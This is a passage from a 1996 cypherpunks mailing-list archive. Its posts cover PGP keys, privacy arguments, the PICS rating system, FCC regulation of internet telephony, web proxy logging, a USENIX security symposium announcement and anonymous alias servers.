|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li> (by way of loki@infonex.com (LanceCottrell))
Date: Tue, 7 May 1996 07:34:42 +0800
To: cypherpunks@toad.com
Subject: Re: Key
Message-ID: <adb3dbd3000210041855@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 May 1996, Lance Cottrell wrote:

> Why did you decide to create this additional key. What role are you
> reserving the other one for?


It's more convenient for me to sign on a multi-user system.  As I don't
want to compromise my main key, a lower security document signing key
would seem in order.

Feel free to copy this to the list.


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Tue, 7 May 1996 09:16:23 +0800
To: jamesd@echeque.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <adb3dc8c0102100443a4@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


One should also note that the surplus beyond subsistence was much smaller
at that time. A more useful figure might be the percent tax on surplus. If
the serf was taxed at 10%, but only had a 5% surplus above survival needs,
then he was in a difficult position. Unfortunately I see no chance of an
agreement on how to define surplus.

        -Lance

At 7:20 AM 5/6/96, jamesd@echeque.com wrote:
>At 11:16 PM 5/5/96 -0700, Sandy Sandfort wrote:
>>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>                          SANDY SANDFORT
>> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>>
>>C'punks,
>>
>>On Sun, 5 May 1996, Alan Horowitz wrote:
>>
>>> didn't the feudal vassels only pay 33% ?
>>
>>Actually, no.  When I used to edit a magazine, I commissioned an
>>article about how much "tax" slaves, serfs, etc. paid.  That is,
>>how much of what they produced, did they get to keep; how much
>>went to their masters.  The surprising, cross-cultural answer my
>>researcher/writer found was that they got to keep everthing they
>>produced except 5-10%.  That's a lot better, percentage-wise,
>>than for modern "tax slaves."
>
>
>In the early feudal period, ordinary knights did not live well.
>They were only moderately better off than peasants, and yet to support one
>knight, you needed a startlingly large number of peasants, a fact
>that kings were continually unhappy about and continually trying
>to fix.
>
>While it is difficult to assess the tax rate, because taxes were
>in kind, it was clearly very low by modern standards.
> ---------------------------------------------------------------------
>                                        |
>We have the right to defend ourselves   |   http://www.jim.com/jamesd/
>and our property, because of the kind   |
>of animals that we are. True law        |   James A. Donald
>derives from this right, not from the   |
>arbitrary power of the state.           |   jamesd@echeque.com

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Tue, 7 May 1996 09:06:48 +0800
To: cypherpunks@toad.com
Subject: Re: [History] USPS tried to monopolize email? (c. 1981)
Message-ID: <v02140b00adb3db04638d@[204.179.131.70]>
MIME-Version: 1.0
Content-Type: text/plain


The U.S. Postal Service's first attempt at E-mail was called "E-COM" (ca.
1984), and it amounted to an electronic submission system for mail that
would then be printed, stuffed into envelopes, and delivered in the usual
way - but done so at the regional centers. It was geared toward 3rd class
mass mailings, and was a dismal failure. While it was cheaper than standard
3rd class mailings, the mailings were output on Printronix dot-matrix line
printers, and they looked terrible. Who knows? If they'd invested in laser
printers instead...

Some of you who were on the UUCP/USENET at the time may remember a small
company on the UUCP network in Rockville, MD called "netword", which would
accept E-mail for E-COM and deliver it for free; the deal was that the
input batches to E-COM had to be of a certain size, and the "netword" folks
rounded out their batches with the stuff from the net.

Eventually, E-COM was sold (I seem to recall the Netword people bidding on
it), and it disappeared shortly thereafter. I know about this story because
Netword was a customer of another company which has also since disappeared:
Dual Systems of Berkeley, California, makers of a Motorola 68000-based,
Version 7 (and later System V) UNIX system on the S-100 (IEEE-696) bus. I
worked for Dual from March '83 to June '85 - my first job out of college.

        Erik Fair       fair@clock.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 7 May 1996 09:52:06 +0800
To: cypherpunks@toad.com
Subject: Re: L. Detweiler is a CyberAngel [NOISE]
In-Reply-To: <Pine.SCO.3.91.960506092756.6576C-100000@grctechs.va.grci.com>
Message-ID: <199605061714.KAA15944@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



"Mark O. Aldrich" <maldrich@grci.com> writes:
>Is this stuff collected and published by LD himself, of is someone just 
>fronting it?  The tone of the prose seems a little weird, but I wasn't on 
>c'punks during his heyday, so I can't tell.  It seems a little too 
>self-effacing at times for the style of a net.loon.

LD isn't a loon, in my opinion.  He has a strongly-held but consistent
opinion on matters of computer privacy.  His "loon" reputation (and
election, IIRC) stems from back in the days when he was making his points
by performance art and example, rather than by reasoned argumentation and
exposition.  People looking at the performance art and taking it at face
value have been confused by the underlying message and annoyed by the
medium -- not everyone appreciates a cyber-Mapplethorpe.

	Jim Gillogly
	Trewesday, 16 Thrimidge S.R. 1996, 17:09




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 7 May 1996 12:14:01 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: WWW proxies?
In-Reply-To: <v02120d03adb27fe340c9@[192.0.2.1]>
Message-ID: <199605061831.LAA29568@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> site, the commercial value of the information that could be gained by
> logging traffic at the site is tremendous.

	The commercial value of being honest is greater.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Mon, 6 May 1996 23:18:39 +0800
To: cypherpunks@toad.com
Subject: Re: PGP and Pine?
In-Reply-To: <Pine.BSD/.3.91.960505222505.24544G-100000@bud.indirect.com>
Message-ID: <Pine.GSO.3.93.960506114354.27698B-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


 Sun, 5 May 1996, Dan McGuirk wrote:

> I haven't found one, but according to the Pine developers, PGP support is 
> going to be included in the next version (3.92).

Well the current version is 3.93 already, 3.92 was released long time ago.
Can't see any special PGP support in those versions.

Jüri Kaljundi
jk@stallion.ee
AS Stallion





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 7 May 1996 10:49:16 +0800
To: sameer <sameer@c2.org>
Subject: Re: WWW proxies?
Message-ID: <v02120d01adb3f9eac27a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 5/6/96, sameer wrote:
>> site, the commercial value of the information that could be gained by
>> logging traffic at the site is tremendous.
>
>        The commercial value of being honest is greater.

In your evaluation, perhaps. In the mind of every web proxy site? Doubtful.

In fact, a former client of mine seriously considered offering an
"anonymous" web proxy for the sole reason to be able to capture the traffic
stats.

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cynthia@usenix.org (Cynthia Deno)
Date: Tue, 7 May 1996 12:46:57 +0800
To: cypherpunks@toad.com
Subject: Security Solutions at USENIX SECURITY Symposium
Message-ID: <9605061900.AA14590@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



                6th UNIX Security Symposium
        Focusing on Applications of Cryptography
                     July 22-25, 1996
                Fairmont Hotel, San Jose, California

Sponsored by the USENIX Association, the UNIX and Advanced 
Computing Systems Professional and Technical Association
Co-sponsored by UniForum 
In cooperation with: The Computer Emergency Response Team (CERT) and IFIP WG
11.4

The Symposium is offering day-long tutorials, refereed papers, panel
presentations, invited talks, a vendor display, and Birds-of-a-Feather sessions.
Practical solutions, especially cryptographic approaches, to UNIX security will
be described, dissected, and expanded.  Ron Rivest of MIT delivers the Keynote
Address to kick off the intensive Technical Sessions.  New research on public
key issues, electronic commerce, safe working areas, and secure communication
will be examined in 21 peer-reviewed technical presentations.  UniForum is
sponsoring panel discussions on Security and Privacy; Electronic Commerce,
Cryptography Infrastructure, and Cryptography and the Law.  There will also be
sessions on the latest version of PGP, Internet Firewalls, and the C2Net Privacy
model.  Tutorial topics include:  Implementing Cryptography; World Wide Web and
Internet Security; A Comparison of UNIX Security Tools; and Security for
Software Developers.

Three new features have been added this year.  An informal Vendor Display will
allow hands-on demonstration of security products.  (Vendors may call Cynthia
Deno at 408 335 9445 or email to display@usenix.org.)  USENIX is sponsoring a
secure Internet connection in the Terminal Room.  And, USENIX members will be
able to sign up for the PGP Key Signing Service.

For the complete program and registration materials, visit our Web site:
http://www.usenix.org; send email to: info@usenix.org (your message should
contain the line "send security conference"); or contact the USENIX Conference
office at 714 588 8649.


/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
| Cynthia Deno            |
|
| Tel: 408 335 9445    |                           USENIX
|
| Fax: 408 335 5327   |  The UNIX and Advanced Computing Systems |
| cynthia@USENIX.org |       Technical and Professional Association     |
| Check out USENIX on the Net..........http://www.USENIX.org              |
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 09:19:51 +0800
To: cypherpunks@toad.com
Subject: Arguments _against_ privacy, anyone?
Message-ID: <01I4DWLF4PF48Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu"  6-MAY-1996 01:21:22.00

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sun, 5 May 96 02:28 PDT
From: privacy@vortex.com (PRIVACY Forum)
Subject: PRIVACY Forum Digest V05 #10

PRIVACY Forum Digest        Sunday, 5 May 1996        Volume 05 : Issue 10

-----------------------------------------------------------------------------

Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)
From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

In my online newsletter, The Network Observer, I periodically summarize
and rebut bad arguments against a broad right to privacy.  At the end 
of this message I've included a partial list of the arguments I have
discussed so far.  I would like to gather another batch of arguments,
probably for the July 1996 issue of TNO, and I am hoping that you can 
help me.  Please send me any bad arguments against privacy rights that
you have encountered, even if you can't quite figure out what's wrong
with them, and even if you don't have a specific example ready to hand.
Arguments concerning specific issues such as government records, medical
privacy, and video surveillance are particularly welcome.  Once I finish
this next set of arguments and rebuttals, I'll gather the whole set into
a "handbook" that can be distributed freely on the Internet.

Thanks very much.

Phil Agre

Encl:

The Network Observer can be found on the Web at:

  http://communication.ucsd.edu/pagre/tno.html

The privacy articles can be found indexed a little ways down the page.
Here are most of the arguments that I have discussed in past issues:

  * "We've lost so much of our privacy anyway."

  * "Privacy is an obsolete Victorian hang-up."

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

  * "We have strong security on our data."

  * "National identity cards protect privacy by improving
     authentication and data security."

  * "Informational privacy can be protected by converting it into
     a property right."

  * "We have to balance privacy against industry concerns."

  * "Privacy paranoids want to turn back the technological clock."

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

  * "There's no privacy in public."

  * "We favor limited access."

  * "Privacy in these systems has not emerged as a national issue."

		[ Submissions that would be interesting to the general
		  readership of the PRIVACY Forum would also be very
		  welcome here.  -- MODERATOR ]
		  
------------------------------

End of PRIVACY Forum Digest 05.10
************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 7 May 1996 13:11:09 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: misunderstandings of PICS
In-Reply-To: <01I4BHSBIAK08Y53GG@mbcl.rutgers.edu>
Message-ID: <199605061948.MAA15630@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



EAS
>	The instructions in question, at
>http://www.safesurf.com/cyberangels/#look, are for their "volunteers" to report
>- including to both the page's ISP and to government - any page with sexual
>content that doesn't have a PICS such that it can be censored. In other words,
>they want to try to kick off systems - including potentially via legal action
>such as nonsense like "corrupting a minor" or whatever - any pages that don't
>set themselves up to be censored. That would include by government such as
>China, as well as by fundamentalist parents.

but you still don't understand what I stated. the above does not make
any sense relative to the PICS system. it would be like saying, "we 
are going to report anyone who doesn't have a SMTP that bans dirty
email". SMTP does not ban dirty email by definition. PICS does not
censor material by definition. please read the PICS proposal (sorry the
URL is not handy, could someone post it?)

the CyberAngels and you clearly do not understand how PICS works, even
after I tried to explain what point you do not grasp that is inherent
to its design. notice that you are propagating the lack of knowledge
through your own message, demonstrating nicely how
a little knowledge is a dangerous thing (it seems that ignorance 
spreads as easily or more easily than knowledge does).

PICS *doesn't*involve*the*page*designer*. this is an absolutely 
key component of its design. it exists indepedent of page creators.
if page creators are suddenly being pressured to format their 
pages in some way, then PICS has failed in some of its key design
goals. there are some *optional* ways that page designers can invoke
PICS principles as I understand, but they make no sense to me. (it
would be equivalent to someone rating their own material, something
I think is going to be far from the main use of ratings in the future)

the basic design of early versions of PICS is the following: 
rating servers rate *URLS*. whenever someone wants to grab a URL,
if they have installed software such as SurfWatch, that software
can query the rating server for any ratings on that URL and decide
to display or reject display of the page accordingly. these ratings
may be made by different organizations. they may be contradictory.
this is a basic part of the design of PICS.

notice again this basic distinction between *mandatory rating
capability* and *mandatory rating compliance*.  (sorry can't
think of a better term). PICS does not require the page designer
to do anything, yet it still allows the rating of their information
by third parties. in a sense, the concept of mandatory
rating capability (such that the cyberangels seem to be talking
about makes no sense relative to PICS. it already allows anything
to be rated through no action or inaction of anyone.  the concept
of "mandatory" does not apply to anything within PICS relative
to *content* of pages. the only thing that is mandatory with PICS
is that rating servers follow the standards for formatting the
ratings. but anything can be contained in those ratings. the
market will decide.

please try to understand the difference between the two 
things below:

1. everything in cyberspace must have the capability of being
rated.

2. everything in cyberspace must be rated by government agency X,
and no pages are allowed to be transferred that do not have
acceptable ratings.

the second is censorship. the first is free choice. the first
is what PICS aims for. notice it accomplishes this through absolutely
no action on the part of page designers. by the fact that they
have a URL, the PICS standard uses that URL as a reference.

perhaps you could do a public service to the CyberAngels to help them
understand what PICS is and why they don't seem to understand its
basic concepts.

please, I hope that people can begin to see why PICS is *not* a 
censorship standard, and that it could actually be a powerful weapon
in forestalling *real* censorship attempts, which always involve
restrictions in actual communication not at the choice of (i.e. outside 
the control of) the *recipient* of that information.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Date: Tue, 7 May 1996 12:56:18 +0800
To: cypherpunks@toad.com
Subject: Internet telephony report
Message-ID: <01I4DX1OFOLG8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	While they _probably_ aren't going to start trying to charge for
Internet phone service, the FCC still thinks it should be able to regulate
the Internet - with the egalitarian excuse of equal access as among the
reasons. Hmph... bureaucracy.
	-Allen

From:	IN%"rre@weber.ucsd.edu"  6-MAY-1996 03:21:47.24
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 30 Apr 1996
From: "Craig A. Johnson" <caj@tdrs.com>
To: "Multiple recipients of list cyber-rights@cpsr.org" <errors@snyside.sunnyside.com>
Subject: cr> Regulating the Internet

It is highly recommended that those who are concerned about the
coming communications regulatory regime read the FCC's recent NPRMs
on "universal service" and "interconnection."

--caj

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

ANALYSIS:  FREE NET TELEPHONY
+
by Craig A. Johnson
American Reporter Correspondent
Washington
4/29/96
net-regulation
1023/$10.23

                    THE REGULATORS MEET THE INTERNET
                           by Craig A. Johnson
                     American Reporter Correspondent

        WASHINGTON -- Fears of Rambo-like regulation have spawned a sort
of spring fever in the online world, with presumptive alarms and bulletins
ricocheting all over the Net.
        Will the Federal Communications Commission (FCC) choke the
Internet's wide-open pathways with regulatory underbrush?  Will the
petition filed by the Americas' Carriers Telecommunications Association
(ACTA) on March 4 be granted, stopping Internet telephony or mandating
access charges? (AR, No. 245 ) Or, even more catastrophically, will the
Net somehow be swept under the FCC regime for telecommunications carriers?
        The answers, according to sources both inside and outside of the
FCC, for the time being, are a qualified no.  On April 19, the FCC gave
its tentative response on the Net telephony problem, partially assuaging
worries that new regulations will require access charges and tariffing for
long distance voice over the Internet.  Although the soft no from the FCC
was reassuring, the wall protecting Internet voice as an "information
service" has scores of cracks and may still crumble under the blows of a
regulatory hammer.
        The issue was addressed in the FCC's Notice of Proposed Rulemaking
(NPRM) on "interconnection," or more formally, "implementation of
the local competition provisions in the Telecommunications Act of
1996."  The NPRM is as interesting for what it does not say as for
what it does.
        Generally, it poses a lot of questions, on which parties will file
comments, and on the basis of which the FCC will finalize rules in August.
The agency sees the proceeding and the consequent rules as establishing
"the 'new regulatory paradigm' that is essential to achieving Congress'
policy goals."
        The visible fractures in the old regulatory regime stood out
prominently in the interconnection notice.  Two aspects of the proceeding,
in particular, directly relate to Internet access and pricing regimes.
        First, the FCC made it clear that current access charges and
interconnection regulations are "enforceable until they are superseded."
The FCC said, in regulatory-ese, that it wanted comments on "any aspect of
this Notice that may affect existing 'equal access and nondiscriminatory
interconnection restrictions and obligations (including receipt of
compensation).'"
        Translated, this means that Net telephone providers and users can
breathe a little more easily for the time being.  But, the call for
comments on the existing "restrictions and guidelines" should not be taken
for granted.  It is precisely these regulations -- which exempt "enhanced
service" providers, like Internet and online service providers from paying
access charges for their usage of the facilities and network components of
local exchange carriers (LECs) -- which are on the table in this
proceeding and related ones.
        A second aspect of the interconnection proceeding relates directly
to definitions.  The Commission asks for comment "on which carriers are
included under" the definition of "telecommunications carriers" offered in
the Telecommunications Act of 1996.
        Critically, the agency asks:  "How does the provision of an
information service [as conventionally defined in the law and prior
regulations], in addition to an unrelated telecommunications service,
affect the status of a carrier as a 'telecommunications carrier?'"
        This is a call for commenters to address the issue of whether
"information service providers," such as ISPs, who also provide
"telecommunications services," should be treated as "telecommunications
carriers" and therefore be subject to all, some, or none of the
requirements of common carriers, including the payment of access charges
and the filing of tariffs.
        In practical terms the FCC is asking the online community to
persuade them that ISPs who permit Internet audio streaming applications,
such as long distance voice, should not be considered under the same rules
applying to "telecommunications providers."
        The FCC emphasizes that the interconnection rulemaking "is one of
a number of interrelated proceedings," and explains that the answer to
how, in which ways, and to what extent the Internet will be regulated will
be a product of "the interrelationship between this proceeding, our
recently initiated proceeding to implement the comprehensive universal
service provisions of the 1996 Act and our upcoming proceeding to reform
our Part 69 access charge rules."
        This should be seen as a warning flag that issues concerning
access charges for the Internet have yet to be even taken up by the
Commission, and will be one of the outcomes of several complex
proceedings, with public comments invited from all consumer and business
interests.
        The FCC NPRM and order establishing the joint federal-state
universal service board, issued on March 8, for example, emphasizes the
provision in the Telecommunications Act of 1996 which stipulates that
"[a]ccess to advanced telecommunications and information services should
be provided in all regions of the country."  The FCC says that "commenters
may wish to discuss Internet access availability, data transmission
capability, ... enhanced services, and broadband services."
        In both this and the interconnection notices, the agency
emphasizes its statutory authority to regulate the Internet.  The news so
far is relatively positive.  The FCC claims it doesn't want to prematurely
slap regulations on the Net which may stunt its remarkable growth and
vitality.
        But the handwriting is on the wall -- in several different hands
and scrawled over cracks.  Arguments for Internet volume-based or
per-packet pricing will be surely surface in comments in the FCC
proceedings.  The old argument for the "modem tax," which says that data
bits should be priced differently than voice bits, will likely rear its
scarred head.
        Internet access is on the charts and in the dockets at the
Commission.  It should have the same pride of place for all Internet
activists and user group communities.  The FCC is asking the Internet and
computer user and business communities to wake up to an emergent
regulatory regime in which the old comfortable dualities such as
"information services" and "telecommunications services" -- which in the
past have insulated the Internet from regulation -- may not be easily
parsed.  In short, the agency is begging for help in drafting the
cyber-roadmaps for the future.
        (Note:  Both the universal service NPRM and order and the
interconnection NPRM can be accessed via the FCC's Web page --
http://www.fcc.gov.  Many of the comments for the universal service
proceedings are also now available at the site.)

                               -30-

         (Craig Johnson writes on cyber rights issues for WIRED.)





                 The American Reporter
                  "The Internet Daily Newspaper"
                 Copyright 1995 Joe Shea, The American Reporter
                All Rights Reserved
        The American Reporter is published daily at 1812 Ivar
        Ave., No. 5, Hollywood, CA 90028 Tel. (213)467-0616,
        by members of the Society of Professional Journalists
        (SPJ) Internet discussion list.  It has no affiliation
        with the SPJ.   Articles may be submitted by email to
        joeshea@netcom.com.  Subscriptions:  Reader: $10.00
        per month ($100 per year) and $.01 per word to republish
        stories, or Professional:  $125.00 per week for the re-use
        of all American Reporter stories.  We are reporter-owned.
        URL:  http://www.newshare.com/Reporter/today.html
        Archives: http://www.newshare.com/Reporter/archives/
 For more info on AR: http://oz.net/~susanh/arbook.html

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


   ~ CYBER-RIGHTS ~
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-
Visit The Cyber-Rights Library,  accessible via FTP or WWW at:

ftp://www.cpsr.org/cpsr/nii/cyber-rights/Library/
http://www.cpsr.org/cpsr/nii/cyber-rights/Library/

You are encouraged to forward and cross-post list traffic,
pursuant to any contained copyright & redistribution restrictions.

~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 7 May 1996 03:02:33 +0800
To: jordan@Thinkbank.COM (Jordan Hayes)
Subject: Re: PGP and Pine?
In-Reply-To: <9605060440.AA22456@blood.Thinkbank.COM>
Message-ID: <199605061109.NAA13436@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> That reminds me that I have been meaning to send out what I use for PGP
> and ucbmail.  First of all, since you can ~| outgoing messages, I don't
> need any support for sending.  For receiving, there's two ways to
> 'edit' messages: 'e' invokes $EDITOR and 'v' invokes $VISUAL on a
> message.  I actually use 'v' so I set $EDITOR (in my .mailrc) to
> ~/bin/mypgp which looks like this:
> 
> 	#!/bin/csh
> 	pgp -f < $* | more
> 
> So to read a PGP'd message, I just type 'e' ...
> 
> Anyone else do something interesting with ucbmail?


I suppose my BAP scripts would work with it.  (BAP 
basically does just what you describe above, with a few 
added features.)


Let me know if you want a free copy of BAP.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMY3d2UjbHy8sKZitAQG/KAMAjaBf7qYa3ZY6i67h7dheohPOxTYe5rZ2
WUj+c/0YqZ8B0Acj/qEbriSTsJlCJEZoJ2KJFHhWJVctOGk+hg4l8ER3FNNB8lbY
KcHhi2sakDi+4O6TfPggIQSHVX2svnoB
=4Ksy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.org (Rishab Aiyer Ghosh)
Date: Tue, 7 May 1996 14:07:08 +0800
To: rishab@dxm.org
Subject: New Internet peer-reviewed journal released
Message-ID: <199605062013.NAA24470@nic.cerf.net>
MIME-Version: 1.0
Content-Type: text/plain



New Internet Journal Released

Paris, France, 1996 May 6: Coinciding with the opening of the 
International World Wide Web Conference, a new journal dedicated 
to the Internet was released today by Munksgaard International 
Publishers. The journal is called "First Monday" and it is a 
peer-reviewed, electronic journal dedicated to the Internet, and 
only available on the Internet. It is the first electronic journal 
from Munksgaard, publishers of over seventy scientific journals in
dentistry, medicine, and other fields.

"First Monday" will appear on the first Monday of each month. Each 
issue will contain five to six full-length articles, plus regular 
features such as interviews and reviews. The inaugural May issue 
contains articles by notable specialists such as David Johnson and
David Post, co-directors of the Cyberspace Law Institute, and John 
Seely Brown, vice-president and chief scientist of Xerox Corporation 
and director of Xerox Palo Alto Research Center. 

The journal is available at http://www.firstmonday.dk

The editorial team of "First Monday" is widely experienced in computing,
telecommunications, and the Internet. Chief and Managing Editor is Edward 
J. Valauskas, author and editor of several widely recognized books on 
computing and the Internet, including "Internet Troubleshooter" and 
"Internet Initiative." He is joined by Esther Dyson as Consulting Editor 
and Rishab Aiyer Ghosh as Inter-national Editor. Esther Dyson is president 
of EDventure Holdings in New York City and chairperson of the Electronic 
Frontier Foundation. Rishab Ghosh, based in New Delhi, is editor and 
publisher of the Indian Techonomist, a newsletter on India's information 
industry. 

The editorial board of "First Monday" includes Vinton G. Cerf, founding 
President of the Internet Society and is currently Senior Vice-President 
at MCI; Ed Krol of the University of Illinois, author of several books 
including the highly popular "The Whole Internet User's Guide & Catalog"; 
Bonnie Nardi of Apple Computer, author of the book "A Small Matter of 
Programming" and editor of "Context and Consciousness"; Rich Wiggins of 
Michigan State University, author of "The Internet for Everyone"; Tony 
Durham, Multimedia Editor of the Times Higher Education Supplement in 
London and a member of the team which has developed THESIS, the 
newspaper's Internet service; Ian Peter, consultant in information 
technology, media and communications policy, based in Australia; and
Robert Hettinga, a digital commerce consultant in Boston.

"First Monday" publishes articles on the Internet and the Global 
Information Infrastructure. It follows the political and regulatory 
regimes affecting the Internet, and examines economic, technical and 
social aspects of the use of the Internet on a global scale. There 
will also be reports on the use of the Internet in specific communities, 
the development of Internet software and hardware, and the content of 
the Internet.

"First Monday" was released today on diskette, distributed at the 
International World Wide Web Conference in Paris, and on the First 
Monday Internet server at http://www.firstmonday.dk. In the future 
it will appear in three formats: as an electronic mail posting to 
subscribers; on the World Wide Web; and as an annual CD-ROM archiving 
all articles that have appeared in "First Monday."

Munksgaard was founded in 1917. Over the years Munksgaard has expanded 
to become a publishing house that is internationally recognized for 
its scientific journals devoted to servicing the international scientific 
and scholarly communities.

Editorial Office:
Editor-in-Chief: Edward J. Valauskas
(valauskas@firstmonday.dk)


First Monday is published monthly by:
Munksgaard International Publishers
Nxrre Sxgade 35, P.O. Box 2148
DK- 1016 Copenhagen K
Denmark
e-mail: publishers@firstmonday.dk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 11:06:41 +0800
To: des@juno.com
Subject: Re: alias servers  (al la alias.c2.org)
Message-ID: <01I4DXULRMKS8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"des@juno.com" 27-APR-1996 04:36:45.71

>On Fri, 26 Apr 1996 20:30:38 -0400 (EDT) Black Unicorn
><unicorn@schloss.li> writes:
>>Is anyone besides c2.org running an alias server?


>There's a few of them - nym.gondolin.org, nym.alias.net, and
>alias.alias.net are the others that leap to mind just now.
>Of course, having just previewed the Juno "free-email"
>service, I might count it also.

	How much information do they actually want, and how much do they
check? I seem to recall that they wanted some info for giving to the
advertisers and for targeting the advertising.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
